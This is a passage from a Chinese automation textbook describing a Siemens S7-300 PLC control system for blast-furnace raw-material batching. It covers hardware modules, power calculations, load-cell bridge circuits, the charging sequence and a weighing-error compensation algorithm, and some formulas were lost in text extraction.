SIL3级安全设备 冗余 安全系统总线 标准的现场总线系 统的漏洞 B 直接改变生产过程 , 或 者 SIL3级安全设备 安全系统总线 继电器在生命周期 内的非正常工作 C 直接改变生产过程 , 或 者 SIL2级安全设备 安全继电器 安全系统总线 电磁阀在生命周期 内的非正常工作 C 直接改变生产过程 , 或 者 SIL2级安全设备 安全电磁阀 安全系统总线 可编程逻辑控制器 的非正常工作 B 直接改变生产过程 , 或 者 SIL3级安全设备 安全可编程逻辑控 制器 安全系统总线 6.2 PLC自动化在钢铁工业控制中的应用 6.2.1 PLC在钢铁高炉槽下配料控制系统应用 某公司的6号高炉槽下控制系统主要现场设备包括: 矿石皮带机 (1号 、2号) 2台 、 碎矿皮带机1台 、焦炭皮带机1台 、碎焦皮带机1台 、矿石称量漏斗9套 、料坑矿石称量漏 斗2套 、焦炭称量漏斗2套 、焦炭振动筛及闸门4台 、烧结矿振动筛及闸门9台 、振动给料 机及闸门5台 、 防尘电动卸料车2台 、重量变送器14台 、称重传感器42只 、一套驱动仓门 开关的液压站系统 。 6.2.1.1 高炉槽下配料控制系统总体方案 采用以 PLC为主的自动化控制系统 ,该系统由计算机 、仪表控制和电气控制组成 , 三 电系统功能分配如下: .计算机作为控制系统的人机界面 ,通过通信装置采集生产数据 ,对生产工艺数据进行 显示 、加工处理 、输出控制命令等 。 .仪表系统主要功能是对各种参数(压力 、温度 、流量 、物位 、成分等) 进行检测与控 制 , 主 、副原料 、铁合金等物理量的称量 。 .电气系统用于各种阀站 ,皮带输送控制 ,原料装入控制及安全连锁保护等 。 根据高炉生产工艺和操作的要求 ,整个工程自动化系统拟采用现行成熟的计算机控制系 统一级以 PLC为核心构成基础级 ,完成电气传动控制 、仪表过程控制 , 使用网络技术构成 基于控制器的分布式控制系统二级计算机系统 , 拟采用实现炼铁过程跟踪 、生产过程控制 等 。通过网络通信 ,从而实现三电信息共享 ,两级系统协调配合 ,共同完成对过程的自动控 制 、监视和管理 。 (1) 控制系统组成 。 该控制系统采用西门子 PLC, 主要由控制站 、高速交换机 、高速数据通信网构成 ,还包括用于连接远程机架或远程 I/O的现场总线或专用网络 ,具体配置如图6-18所示 。系统具有以下特点: 1) 电气 、仪表和计算机系统采用网络连接 ,实现 EIC三电一体化 。 2) 电气和仪表采用相同的控制设备 , 编程及控制统 一 , 且挂在同一个网络上 , 通信方便 , 减少通信硬件接口 ,合理分担控制功能 。 3) 电气和仪表采用相同的操作 图 6-18 6号高炉槽下配料控制系统结构图站 ,操作简化且统一 ,有利于稳定生产 。 4) 槽下配料系统设有一个 PLC主站 ,全部I/O模板通过 Profibus网与主站连接 。 主站 PLC的 CPU选用 S7-300的高性能中央处理器 ,I/O模板全部选用 S7-300系列模板 。 5) 每个系统皆配有2个监控站 ,互为备用 。 6) 主干网采用10/100M 工业以太网 ,槽下配料系统的操作站及 PLC主站通过工业以 太网交换机挂在主干网上 ,并可通过光纤远距离通信主干网可方便地扩展 ,通过工业以太网 耦合器与计算机通信 。每个系统选用一个工业以太网耦合器 ,通过光纤连成环网可做到主干 网络冗余 。 7) 控制器扩展网采用 Profibus网 ,采用这种结构具有各控制器 、工作站之间数据交换 快 ,可靠性高 ,工艺过程直观 ,操作简便 ,可扩展性好等优点 ,这种结构是 Siemens公司通 常采用的控制方案 , 已经广泛地应用于工业控制领域 。 8) 槽下配料控制室设有监控站 ,对配料的各项工艺流程进行监控 。包括工艺流程显示 、 配方 、工作方式选择 、趋势曲线 、报警 、报表打印等功能 。 (2) 系统设备特点 。 1) 采用先进的硬件设备 ,Siemens S7-300PLC/ET200M 及国际品牌的计算机 ,具有高可靠性 、可用性和可维护性 , 系统的模板可带电插拔 。 2) 控制系统具有完善的在线自诊断功能 。CPU模板 、I/O卡件等在模板上有相应的指 示灯 ,信息在上位机具有详细信息显示 。 3) 采用先进的系统支持软件 ,采用 Step7、WinCC可在 Win2000/Win XP中指示运行 。 4) 性能价格比好 、成本低 。 5) 合理的系统划分 ,如采用两级自动化 、分层管理 、功能管理 、功能分担 , 方便维护 和增添 。 6) 兼容性好 。 7) 使用最新技术 ,如综合显示画面(把主要参数及信息 、 图形等集中在一个画面 , 以 求一目了然 ,亦可有详细子画面)、 三维显示画面 、动态显示画面 、多媒体技术 (如自然语 言报警等)、 保留可装设人工智能和模型控制等的可能性 。 8) 对于顺序流程控制 , 编程软件提供了数种方法 。可以用标准语言梯形逻辑 (LAD)、 语句表(STL) 或功能块图(FBD) 生成控制顺序 。 9) SIMATIC S7-300/400及工控机符合有关国际标准 。 6.2.1.2 高炉槽下配料控制系统硬件方案 (1) 上位机硬件配置 。 本系统上位机选用 IPC-610工业计算机 、PIIICPU、 1024内存 、 60G硬盘 、 NEC2000 大屏幕显示器 ,可以清晰地显示各种图形和文字 , 运行 WinNT操作系统; 外接打印机打印 报表工控机由一台1kVA的不间断电源 LTPS供电 ,保证报表数据的完整记录 。 (2) 电气控制系统 。 6号高炉槽下控制系统是由电源柜 、PLC柜 、 三台伺服控制柜 、两台计量电子秤控制 柜 , 以及一台琴式集中控制操作台构成 。 电源柜的设立是为了对 PLC柜 、伺服控制柜 、 电 子秤控制柜和室内照明 、空调电源等实现电源集中管理根据现场分析 。高炉槽下控制系统的 系统输入输出有近300点 , 为此需设计两台 PLC控制柜 , 内置 300点I/O隔离; 隔离器件 采用 HH54P继电器 ,继电器在起到隔离作用的同时也可增强其控制功率; PLC控制柜中有 一台采用高质量的钮子开关置于印制的喷砂厚铝板上 , 组成 PLC矩阵式输入装置 , 该矩阵 板镶嵌于面板上 ,便于输入操作 。对各种设备驱动电机的控制 , 是根据 PLC的指令 , 经隔 离继电器送至伺服控制柜 , 由伺服控制柜接收 PLC指令 , 有序地控制各设备运行 。 系统运 行方式分为自动和手动 。 为了防止意外故障的出现影响到系统的正常运行 ,设置琴式操作 台 ,便于操作工在必要时进行手动操作 。 (3) PLC的选型及模块配置 。 1) 下位机 PLC的选型 。下位机的选型和模块的配置与控制对象及控制任务有关 , 根据 分析统计可得 ,本系统需要配置如下的不同性质的I/O点 。 .14个模拟量输入(电子秤称重)。 .145个开关量输入(矿门 、焦门 、 中间仓的关限 ,仓料的空满信号 , 焦仓 、焦筛 、皮 带 、 中间仓的自动停用和工作信号 , 以及皮带 、 电磁阀等的电源信号 , 和系统料批复位信号 的采集)。 .103个开关量的输出(矿筛 、焦筛 、给料机 、皮带的启动信号 , 以及焦车 、矿门 、焦 门的动作信号等)。 根据对控制任务的分析 ,本项目选用了 Siemens的模块化小型 PLC系统 S7-300, 它能 满足中等性能要求的应用 ,应用领域相当广泛 , 其模块化 、无排风扇结构和易于实现分布 、 易于用户掌握等特点使得 S7-300成为各种从小规模到中等性能要求控制任务的既方便又经 济的方案 。S7-300系列具有的多性能的 CPU和多功能的I/O扩展模块 , 方便用户根据设计 进行选择 。 当任务规模扩大并且愈加复杂时 , 可随时使用附加的模块对 PLC进行扩展 。SI- MATICS7-300所具备的高电磁兼容性和强抗振动 、抗冲击性 ,更使其具有强大的工业适应 性 。它们可以正常工作的环境条件见表6-8。 表 6-8 SITMATICS7-300正常工作的环境条件表 环境条件 范 围 备 注 温度: 水平安装 垂直安装 0~60℃ 0~60℃ 相对湿度 5%~95% 大气压力 1080~795kPa 相当于 1000~2000m的高度 此外 ,S7-300系列 PLC还具有模块点数密度高 , 结构紧凑 , 性价比高 , 性能优越 , 装 卸方便等优点 。 2) PLC的模块配置 。根据I/O点数及其特性 ,配置了如下的模块 。 .两个模拟量输入模块 SM331(AI8×12Bit): 可提供具有 12位分辨率的总数为 16路 的模数转换通道 。 .五个数字输入模块 SM321(DI32×24VDC): 可提供总数为 160路的开关量输出 通道 。 .四个数字量输出模块 SM322(D032×24VDCIO.SA): 可提供总数为128路的开关量 输出通道 。 .中央处理单元 CPU315。 .通信处理器 CPU343-5。 .接口模块IM360和IM3610。 该系统的结构和配置如图6-19所示 。 S7-300PLC采用背板总线的方式将各模块从物理上和电气上连接起来 。 除 CPU 模块 外 , 每块信号模块都带有总线连接器 。安装时先将总线连接器装在 CPU模块并固定在导轨 上 ,然后依次将各模块装入 。 电源模块与其他模块之间是通过电缆连接 。 (4) PLC模块功能与作用 。 图6-19给出了项目中配置的S7-300PLC模板的型号和数量 ,下面是这些模块的功能与作用。 1) PLC的中央处理器 CPU315。CPU315是 S7-300的计算中心 ,所装载的存储器基本 容量为48KB或80KB,可用存储卡扩充装载存储器 ,最大容量可达到 512KB。 每执行 1000 条二进制指令约需0.3ms, 最大可扩充1024点数字量 , 110或 128路模拟量通道 。CPU315 内装硬件实时时钟 。 CPU315的操作系统是事件驱动的用户程序扫描过程 。CPU响应哪个事件 , 操作系统 自动调用该事件的组织块 OB。CPU315可调用128个功能块 FB(0~127); 128个功能调用FC(0~127); 127个数据块 DB(1~127, 0保留)。 OB、FB、FC、DB的容量均不大于 8KB。此外 ,还有38个系统功能块 SFC集成在操作系统中供用户调用; 有 5个系统数据块 SDB装载 S7-300系统参数 。 CPU315适用于要求高速处理和中等I/O规模的任务 。它可以装载中等规模的程序 ,并 具有中等的指令执行速度 。 2) 接口模块IM360和IM361。 当 PLC系统的规模较大 , 一个机架不能容纳所有的模 块时 ,就要增添扩展机架 , 这时装有 CPLT的机架称为主机架 。 主机架和扩展机架之间通 过接口模块IM360和IM361形成统一的整体 , 每个机架的接口模块通过总线连接器连接到 I/O模块 。接口模块是自组态的 ,无需进行地址分配 ,具有指示系统状态和故障的发光二极 管 LED。如果 CPU不确认此机架 ,则 LED闪烁 。 一个系统可以有中央机架和最多三个扩展机架 , 每个机架最多八个扩展模块 ,相邻机架 的间隔为4cm~10m 。 IMI360必须安装在 S7-300的 0号主机架上; 数据通过连接线 368由 IM360传输到 IM361; IM360和IM361之间的最大距离不超过 10m 。IM361接口模块安装在 S7-300的 1 号到3号的机架上; 数据通过连接线368由IM360传输到IM361,再从IM361传输到下个 机架上的IM361; 每个IM361需要一个外部 24V电源 , 向扩展机架上的所有模块供电 。 可 通过电源连接器连接 PS307负载电源 。 3) 通信处理器模块 CP343-5。 CP343-5是用于 Profibus-DP总线系统的 SIMATIC S7- 300通信处理模块 。它内部带有微处理器 ,用来分担 CPLT的通信任务 ,并支持与其他的通 信连接; 它可以通过 Profibus-DP与 Profibus站点通信; 与编程器 、人机界面装置进行通 信 , 与其他 SMATICS7系统进行通信 。CP343-5通信处理器模块具有 SMTICS7-300系统 结构紧凑的优点 ,其9针 D型连接器用于连接 Profibus, 4针端子排用于连接外部24V直流 电源电压 。 4) 32路数字输入模块 SM321。数字输入模块 SM321向外提供电源 ,将位于现场的开 关触点的状态经过光电隔离和滤波 , 将从过程传输来的外部数字信号转化为内部 S7-300信 号电平 ,然后送至输入缓冲器等待 CPU采样; 采样时 , 信号经过背板总线进入到输入映像 区 。SMI321数 字 输 入 模 块 具 有 32位 独 立 的 输 入 点 , 用 于 连 接 开 关 或 2 线 接 近 开 关(BERG) 数据采集部分与背板总线通过光耦合器隔离 。模块的每个输出点有一个绿色发光 二极管 LED显示输入状态 ;输入开关闭合 , 即有输入电压时 , LED亮 。SM321内部电路原 理如图6-20所示 。 图 6-20 SM321内部电路原理图 5) 32路数字输出模块 SM322(DO32×24VDC/0.5A)。 数字输出模块将 S7-300的内 部信号电平转化为控制过程所需的外部信号电平 。按负载回路使用的电源不同分为: 直流输 出模块 、交流输出模块和交直流两用输出模块 。 SM322(DO32×24VDC/0.5A) 属于晶体管输出方式的模块 , 只能带直流负载; 32个 输出点 ,分成8组; 0.5A的输出电流 。该模块输出具有短路保护功能 ,适用于连接电磁阀 、 接触器 、小功率电机灯和电机起动器 ,其内部电路原理图如图6-21所示 。 由图可以看出背 板总线接口产生的位电平信号驱动光电耦合器 ,实现与外部电路的隔离 。 6) 8路12位分辨率模拟量输入模块 SM331。SM331(AI8×12Bit) 是 8通道的模拟量 输入模块 ,在系统中用于输入电子秤的测量值该模块主要是由 A/D转换部件 、模拟切换开 关 、补偿电路 、恒流源 、光电隔离部件 、逻辑电路等组成 。 A/D转换部件是模块的核心 ,其转换采用积分方法 。积分式 A/D转换的积分时间直接 影响到 A/D转换时间和 A/D转换精度 。积分时间越长 , 被测值的精度越高 。 SMI33I可选 的积分时间有: 2.5, 16.7,20ms和100ms。 在我国 , 为了抑制工频及谐波干扰 , 一般选用 20ms的积分时间 ,相应精度为12位 。 S7-300的 CPU用16位的二进制补码表示模拟量的值 ,其中最高位为符号位 S。“0”表 示正值,“1”表示负值 。 S7-300模拟输入模块的输入测量值范围很宽 , 可直接输入电压 、 图 6-21 SM322内部电路原理图 电流 、 电阻 、热电偶等信号 。它用于连接不带附加放大器的模拟执行元件和传感器 ,可以将 扩展过程中的模拟信号转化为 S7-300内部处理用的数字信号 。 SM331的8个模拟量输入通道共用一个积分式 A/D转换部件 。 即通过模拟切换开关, 各个输入通道按顺序一个接一个转换 。某一通道从开始转换模拟量输入值起 ,一直持续到再 次开始转换的时间称为输入模块的循环时间循环时间是对外部模拟信号的采样间隔对于一个 积分时间设定为20ms, 8个输入通道都接有外部信号且都需断线监视的 SM331, 其循环时 间为(22+10)×8=256ms。 SM331的每两个输入通道构成一个输入通道组 , 可以按通道组任意选择测量方法和测 量范围 。模块上需接24V DC的负载电压 L+ , 有反接保护功能 。模块与 S7-300CPLT及负 载电压之间采用光电隔离 。SM331内部电路原理如图6-22所示 。 另外 , 为了使模拟量输入模块获得最佳的抗干扰性能 ,可以将不使用的通道与 M 短接 。 7) 电源模块 PS307(5A)及其容量计算 。PS307电源模块的输入接单相交流 ,输入电压 为120/230V,50/60Hz;输出电压24V DC,输出电流5A;在输入和输出之间有可靠的隔离 。 电源输出指示器用一个 LED指示 。如果正常输出额定电压24V,则绿色 LED点亮; 如 输出电路过载 ,则 LED闪烁 ;输出电流长期在5~7A之间时 ,输出电压下降 , 电源寿命缩 短; 电流超过 7A 时 , 电压跌落 , 跌落后可自动恢复; 如输出短路 , 则输出电压为 0V, LED变暗 ,在短路消失后电压自动恢复 。PS307(5A) 的基本电路如图6-23所示 。 在实时控制系统中 ,接地是抑制干扰使系统可靠工作的主要办法 。如能把接地和屏蔽正 确结合起来使用 ,可以解决大部分干扰问题 。 图 6-22 SM331内部电路原理图 在确定所有的模块并组建 S7-300系统时要 选择合适的电源模块 。其选择准则是电源模块的 输出功率必须大于 CPU模块与所有I/O模块功 率之和 , 并且要有 30%左右的余量 。 故在设计 系统时考虑每块模块的电流消耗和功率损耗是非 常必要的 。表6-9列出了在 24V直流负载电源 下 ,所选用的各种 S7-300模块的电流损耗及从 24V负载电源吸取的电流 。 图 6-23 PS307(5A) 的基本电路图 表 6-9 各 模 块 电 流 容 量 表 模 块 通过背板总线吸取的电流 (最大值) 从 24V负载电源吸取的电流 (不带负载运行) 功率损耗 (正常运行) CPU315 供 12A 1A 8W 1M360 350mA 2W 1M361 供 0.8A 0.5A 5W CP343-5 70mA 0.6A 7.25W SM321 25mA 1mA 3. 5W SM322 70mA 100mA 4. 9W SM333 60mA 60mA 1. 3W 机架0上24V电源由 CPU315向其他模板供电, 另外插入 IM360, CP343-5各 1块, SM331模拟输入板2块 , SM322数字输出板 3块 , 这些模块从 S7-300背板总线吸取的电 流为 350+70+2×60+3×70=750(mA) 没有超过 CPU315所能转供的电流1.2A。 机架1上由24V电源通过IM361向其他模板供电, 另外插入 SM3221块 , 数字输入板 SM3215块 ,这些模块从 S7-300。背板总线吸取的电流为 70+5×25=185(mA) 该电流没有超过IM361所能转供的电流0.8A。 那么 ,各模块从24V电源吸取的总电流为 1000+600+2×60+4×100+5×1+500=2625(mA) 考虑到电源应留有一定的余量 , 所以电源模块应选 PS307(5A) 传感器与执行机构配 料系统中主要的传感器为电子秤 ,所提供的模拟量信息 、是准确配料的依据 。 其他的传感器以开关量提供给 PLC,作为操作决策的依据 ,这些开关输入量有: .矿门 、焦门的关限 。 .仓料的空 、满信号 。 .焦仓 、焦筛 、皮带 、 中间仓的自动停用和工作信号 。 .皮带 、 电磁阀等的电源信号 。 .系统料批复位信号等 。 PLC的控制输出都是一些开关输出信号, 如矿筛 、 焦筛 、 给料机 、皮带的启动信号, 以及焦车 、矿门 、 焦门的动作信号等, 这些信号经功率放大驱动配料系统中对应的执行 机构 。 (5) 称重变送器的有关分析和设计 。 随着工业自动化的发展, 计算机技术在工业生产过程中的广泛应用 ,在冶金 、化工 、煤 炭等连续生产的工业中都提出不同形式的连续自动称量及配料控制等要求, 传统的机械杠杆 式称重装置已不能满足 。 目前工业应用的各种大 、 中型重量变送器 (电子秤), 按其用途区 分, 常见的有以下几类: .容器秤主要对液体 、颗粒状或粉状料进行称重和配料 。 .吊钩秤对大型构件 、集装箱等在吊卸运输过程中进行称重 。 .皮带秤对散装物料在皮带运输过程中进行称重 。 .平台秤有地中衡 、汽车衡等 。 .轨道秤专用于铁道车辆称重 。 称重传感器本质上是测量质量受到地球引力的作用而产生的力 ,所以电子秤在移到不同 的地方时 ,必须对该秤重新较准电子秤由承重和传力机构 、称重传感器 、 电子测量显示仪表 和电源等部分组成 。 电子秤的称重变送器的功能是把机械力转换成一个电信号 ,可以远距离 地传送 ,显示 、记录 ,并可由计算机进行数据处理, 给出控制信号 ,进而实现生产过程的自 动化 。称量传感器被做成密封型 , 从而有良好的防潮 、 防腐蚀性能 , 可以在恶劣环境下 工作 。 电子秤是槽下配料系统中的必备设备 。在该系统中 , 13个矿斗的称重工作由电子秤来完成 ,这种电子秤是容器秤的一种 ,用它对料斗中的矿石和焦炭进行称重 ,这种容器秤由三 个荷重传感器支撑料斗进行重量的检测 。在矿斗和焦仓底部设有称重变送器 , 它采用的是电 阻应变式称重传感器 , 称重变送器将其所受的矿石压力转换成电信号进行传送 , 并通过 LED显示出矿石的重量 。 电阻应变式称重传感器是将应变电阻片粘贴在测量压力的弹性元件表面上 , 当被测压力 变化时 , 弹性元件内部应力变化产生变形 ,这个变形应力使应变片的电阻也产生变化 , 这称 为电阻应变效应实验证明 ,在电阻丝拉伸比例极限内 , 电阻的相对变化与应变成正比 , 因此 可以通过对电阻的测量来测量压力 。 控制系统中一般必须将物理量转化为便于利用的电流或电压 , 因此需要把电阻的变化进 一步转换成电流或电压的变化 。 电桥测量电路是进行这种变换的常用方法 。根据电源不同, 电桥可分为直流电桥与交流电桥 。交 、直流电桥的原理相似 , 为便于说明 , 下面就图 6-24 所示直流电桥测量原理进行分析 。 图6-24中 E和R 为高稳定的精密电源和电阻 。 当传感元件 Rs 处于其某基准状态 R时 (如空载时), 电桥处于平衡状态 ,输出电压 Uo 为 0; 当重 量变化时 ,传感元件的阻值变化为 R(1+δ), 将导致电桥处 于不平衡状态 Uo =E — =E (6 - 9) 由式(6-9) 可以判定 , 即使Rs 的变化率δ相对于被测 量的变化是线性的,Uo 相对于被测量的关系在本质上也是 非线性的 。在δ«2的前提下 ,才可以认为Uo 与δ的关系是 近似线性的 Uo ≈ 图 6-24 直流电桥测量原理 (6 - 10) 欲使Uo 与δ成线性关系 ,可将与 Rs 处于同臂的电阻以恒流源取代 , 如图 6-25所示, Rh 、VT1和 VT2组成恒流源 ,使得通过 R的电流为一恒定值I,得到 Uo = — [E — IR(1+δ)]=IR(1+δ) ℴ (6 - 11) 图 6-25 采用恒流源的电路 若通过调节 Rh 来调节I的大小 , 使得IR=E/2, 则可得到 Uo =IRδ (6 - 12) 图 6-25是一种将传感元件直接接入运放电 路的电桥电路 , 在此电路中传感器元件成为反相 放大器的反馈电阻 。利用理想放大器特点 ,很容 易得到Uo 的表达式为 Uo =IRδ (6 - 13) 由此可见采用恒流源的电桥可得到与电阻的变化率成正比的输出电压 。 图6-24和图6-25中电路的输出Uo 可接至差分放大器或仪表放大器的输入端 ,构成电 桥放大器进行信号的放大 , 以达到期望的输出电平 ,放大电路的设计要注意其输入阻抗应远 远大于电桥的等效内阻 , 以免对电桥产生负载效应 ,影响测量的精度 。 图 6-26 将传感元件直接 接入运放的电桥电路 图6-26是一种将传感元件直接接入运放的电桥电路, 在 此电路中传感器元件成为反相放大器的反馈电阻 。 利用理想 放大器特点, 很容易得到Uo 的表达式为 Uo = — = — δ (6 - 14) 在电桥电路设计中应该注意阻抗的匹配和稳定 , 以及放 大电路的高输入电阻和低失调 。 以上重点讨论了电桥输出与传感元件电阻变化率之间的线性关系问题 。但是 , 即使实现了电桥输出与传感元件电阻变化率之间的线性关系 ,也并没 有解决电桥输出与实际被测量之间的线性关系问题, 因为大多数传感元件本身就是非线性 的 。解决这种非线性问题的传统方法是在后级采用某种非线性电路加以补偿, 而对现代智能 仪表来说, 可以很容易地用软件进行修正 。 称重传感器是电子秤的关键部件之一 。称重传感器的精度 、容量及其性能 ,是选择称重 传感器的重要指标 。精度指标是由电子秤的用途 、使用场合 、综合要求来确定的 。称重传感 器的容量和形式也要根据电子秤的秤量范围 、使用传感器数目 、安装部位 、受载方式等因素 来选择 。 本项目使用了42个称重传感器, 配套使用了14个重量变送器, 称重传感器使用 CYB, 重量变送器采用 XK。 6.2.1.3 高炉槽下配料控制系统软件方案 PLC控制程序的编程采用了 STEP7编程软件作为开发工具, 结构化的程序设计使 PLC 按工艺要求实现了对现场设备的控制 。 6号高炉的配料系统的 PLC控制程序的设计是整个控制系统的核心, 它关系到整个控 制系统的安全 、稳定 、正确运行 。首先在 STEP7中建立一个用于存储控制方案而生成的数 据和程序的新项目, 采用先生成软件再组态硬件的方法 。具体做法是: ①在项目中插入所需 的 S7软件文件夹; ②接下来为可编程模板生成软件; ③组态硬件; ④完成硬件组态后就可 以将 S7程序与 CPU联系起来 。 (1) 配料工艺控制过程分析 。 槽下配料的任务是把原料仓的矿石和焦炭经过振动筛加到对应的称量斗 ,再由皮带运输 机械将矿石 、杂矿 、溶剂送入矿石汇总称量斗 ,然后按照程序系统的指挥装进料车 。 6号高炉槽下包括9个烧结矿仓 (含 2个溶剂仓和 2个杂矿仓), 这些仓布置在料坑两 侧, 矿石在槽下经振动筛后(杂矿和溶剂不过筛), 合格的矿石进入称量漏斗 , 称量好的矿 石再经过主皮带机运至料坑矿石汇总称量漏斗 ,碎矿皮带机设在料坑两侧的筛下, 筛下的碎 矿由皮带机运转至返矿仓, 焦炭经由振动给料筛进入称量斗 。 料坑内设有两个矿石汇总称量斗和焦炭称量斗 , 分别将矿石 、焦炭和各种杂矿装入左 、 右料车中 。 1) 矿石和块矿的称量主要步骤: .操作人员设定好称量斗设定重量; .启动矿石振动给料筛; .按照称量补偿算法到矿石称量斗设定重量进行修正后, 当实际重量等于修正后的设定值时, 停止矿石振动给料筛; .在开启矿石振动给料筛的同时开启返矿皮带机; .停止矿石振动给料延时5s后停止返矿皮带机; .定时通知运输返矿仓中碎矿 。 2) 焦炭的称量的主要步骤: .操作人员设定好称量斗设定重量; .启动焦炭振动给料筛; .按照称量补偿算法到焦炭称量斗设定重量进行修正后, 当实际重量等于修正后的设定 值时, 停止焦炭振动给料筛; .在开启焦炭振动给料筛的同时开启返焦矿皮带机; .停止焦炭振动给料筛延时5s后停止返焦皮带机; .定时通知运输焦炭仓中碎焦 。 3) 杂矿及溶剂的称量主要步骤: .操作人员设定好称量斗设定重量; .启动杂矿及溶剂振动给料机; .按照称量补偿算法到矿石称量斗设定重量进行修正后, 当实际重量等于修正后的设定 值时, 停止矿石振动给料筛 。 4) 装料的主要步骤: .根据料制的设定完成称量斗的称量; .自动开启主皮带机; .开启料制规定的矿石(杂矿和溶剂) 仓闸门; .放空仓中料后关闭仓门; .延时n(现场实际设定) 秒后停止主皮带机; .矿石汇总称量斗显示料满; .记录所开仓中的料重 、料种及在哪一个斗内; .循环执行以上步骤 。 5) 主要控制程序部分 。根据炉内冶炼情况决定需要按某种料制进行装料时 , 通常用料 批程序 、周期程序及备料程序来完成高炉装料 。所谓料批程序 ,实际为确定受料斗达到设定 数值料车时 ,落入高炉内的这批料的组成情况 (即原料品种 、重量及组合关系)。 所谓周期 程序 ,实际为确定这些不同料批在装料时的顺序关系 。应满足下列的主要生产工艺要求: .周期程序是由若干个料批组合而成(根据工艺不同而定)。 .周期程序所选的内容, 可允许若干种不同料批(根据工艺而定)。 .料批程序可设置若干个位置(根据工艺而定)。 .料批程序是指按炼铁工艺要求在控制系统内设定矿 、焦炭的排列组合顺序以及各种料 种的质量 。 .附加焦 、 附加矿在工长值班室和上料操作室均可设定, 正常情况下应在完成一批放料 后控制程序才安排执行 ,原则上以罐为单位 ,如果以车为单位亦可实现仅有一车的设定 。 .备料程序完成槽下称量斗的备料控制 。 .选仓时根据炉长要求, 由操作人员在操作站控制画面上设定每个料批中每车料的组成情况及所选仓号 。备料时程序自动根据设定值选择矿仓料批由焦批和矿批 [由块矿或烧结 矿 、块矿(或烧结矿)+杂矿] 组成 。 .杂矿可以隔几批料加一次到矿批中 。 因而在矿批中可以加块矿 (或烧结矿)、 块矿 (或烧结矿)+杂矿 。 图 6-27 槽下上料系统流程图 .杂矿和块矿 (或烧结矿) 均通过 矿石皮带机加到总矿称量斗中 , 但它们 分别通过矿石称量斗和杂矿称量斗来加 (即矿石和杂矿分开称量)。 .程序选择带有杂矿的矿批时 , 先 打开矿石称量斗闸门 , 延时打开杂矿称 量斗闸门往运矿皮带机供料 , 再运至矿 石汇总称量斗 。 当称量斗放空后 , 分别 关闭矿石称量斗和溶剂斗闸门 。 (2) 配料系统 PLC设计 。 根据控制系统的要求 , 在设计中运 用 Step7结构化编程的优点 , 把实现不 同功能的程序放在不同的块中 , 并在主 程序模块 OB1需要时进行调用 。OB1为 启动块 (Startup), 在系统启动时调用 OB1作为循环扫描块 (Scan Cycle), 每 次执行完后从头执行 , 周而复始 。槽下 上料系统流程如图6-27所示 。 (3) 槽下称重自动补偿软件 。 高炉冶炼对入炉原料要求称重准确 、 配比合理 , 开环称量其误差是无法控制 的 , 每个上千次的频繁称量 , 积累误差 十分可观 , 增加了对炉况控制的难度 。 应用 PLC对称量装置进行闭环控制 , 由 软件根据当次称量产生的误差修正下次 称量参数值 , 对称量误差予以补偿 , 从 而基本消除积累误差 , 保证了原料入炉 重量的准确性 。 根据槽下供料设备工艺 流程 , 每个 称 量 漏 斗 在 每 次 称 量 过 程 中 , 由于原料的粒度不同及给料机械冲 击惯性的影响 , 均会产生称量误差 , 其 称量误差若不进行补偿 , 误差将越积越 多 , 直接影响到高炉的操作精度 , 因此 必须对误差加以抑制 。 其抑制的手段 一 是根据每次称量产生的误差值调整下次称量料满控制值 , 即提前停给料设备的时间 , 使实际装料尽量接近设定重量 , 减少每次 称量产生的误差 ; 二是根据每次称量的误差值 , 修正下次称量目标值 , 对称量误差进行 补偿 。 1) 称量补偿过程中的算法设计 。 .每次备料前自动计算出计划备料重量 Wj 和料满控制值 Wk 。称量漏斗每次备料前, 根据该秤斗的设定重量 Ws (此值由高炉工长根据冶炼工艺计算出来并以料单形式输入 PLC 中), 和需要给上次称量误差进行补偿的重量 Wp (算法由 PLC自动计算), 计算出本次计划 备料重量为 Wj =Ws — Wp (6 - 15) 为了减少机械惯性和给料机设备余振下料等因素所造成的装料偏差 , PLC必须提前发 出料满信号停止给料设备 ,料满信号在秤斗重量达到料满控制值 Wk 发出 , 只有这样 , 才能 确保产生称量误差最小 。料满控制值 Wk 由式(6-16) 得出 Wk =Wj +Wko — Wt (6 - 16) .每次秤斗放空料后自动计算出实际净装料量 W 、和装料偏差 ΔW , 秤斗内装满料后, 备料过程便结束 。 当上料程序选中该秤斗放料时 , 开启称量漏斗闸门放料 ,并自动跟踪电子 秤重量料放空后 ,发出料空信号 ,关闭称量漏斗闸门 。放料过程结束后 ,测得电子秤内残余 挂料重量即秤斗的空秤重量 , 以 Wko 表示 。故可计算出净装料重量 Wji 和装料偏差 ΔW Wji =Wm — Wko (6 - 17) ΔW =Wji — Wj (6 - 18) 其中 ,ΔW 为“ + ” 时表示多装 , 为“ — ”表示少装 。 .自动优化下次料满提前量 Wt 。 降低误差补偿幅度的关键是选择合适的料满提前量, 使每次称量产生的误差尽可能小 。在一次称量结束后 ,可以计算出装料偏差 ΔW , 用这次的 装料偏差来修正下次的备料料满提前量 W; 如果因意外发生的非正常因素 , 致使偏差超出 正常允许的范围 ,则仍以上次的提前量来作为下次的提前量 , 即若 W >C,则令 ΔW =0。 其中 ,C为一设定常数 ,在实际生产中视不同设备 、不同品种而不同 ,可以人工设定 。这样 就可以用本次装料偏差去修正下次备料料满提前量 , 以便更合理 、准确地计算出料满控制 值 ,从而使实际装料量更接近计划装料量 , 为料满提前量计算公式如下 Wtn+1 =Wtn+αΔWn (6 - 19) 式中 ,α为一校正系数 , 取值范围为 0<α<1;α取值越大 , 提前量校正速度就越快, 但过大容易出现振荡现象 ;α值越小 ,校正速度就越缓慢 。校正系数α的取值大小与原料的 颗粒大小 ,下料速度 , 给料设备的余振下料量 ,下料冲击力大小有关如果原料的颗粒大 , 下 料速度快 , 冲击力大 ,α值适当取小些; 反之 。取值略大些 。值一般取值在 60°~90°之间, 视不同料种略有差别 。 总之 ,α的取值一定要适中 。 .自动计算出下次补偿量 Wpn+1 。 在每次秤斗放空 , 装料结束后 , 自动计算积累误差 We ,根据积累误差计算下次补偿量 Wp ,原则是本次的称量积累误差应尽量从下次称量中得 到补偿 。但一次补偿量过大 ,可能会超过秤斗所允许的极限装料能力 ,并且在工艺上也不允 许 。遇到此种情况时 ,先按最大补偿量 Wpmax (可人工预先约定 Wpmax 的值) 进行 , 而剩下的 补偿量(称之为欠补值 Wq )从以后各秤中逐秤补偿回来 。其数学模型可表示为 Wen =Wjin — Ws +Wsn+1 (6 - 20) 其中,Wen 为“ +” 时表示多装 , 为“ — ”表示少装 。则 Wpn+1 = ㊣Wen ㊣ ㊣Wpmax (Wen ≥Wpmax ) (Wen <Wpmax ) (6 - 21) 综上所述 ,各种因素所形成的误差 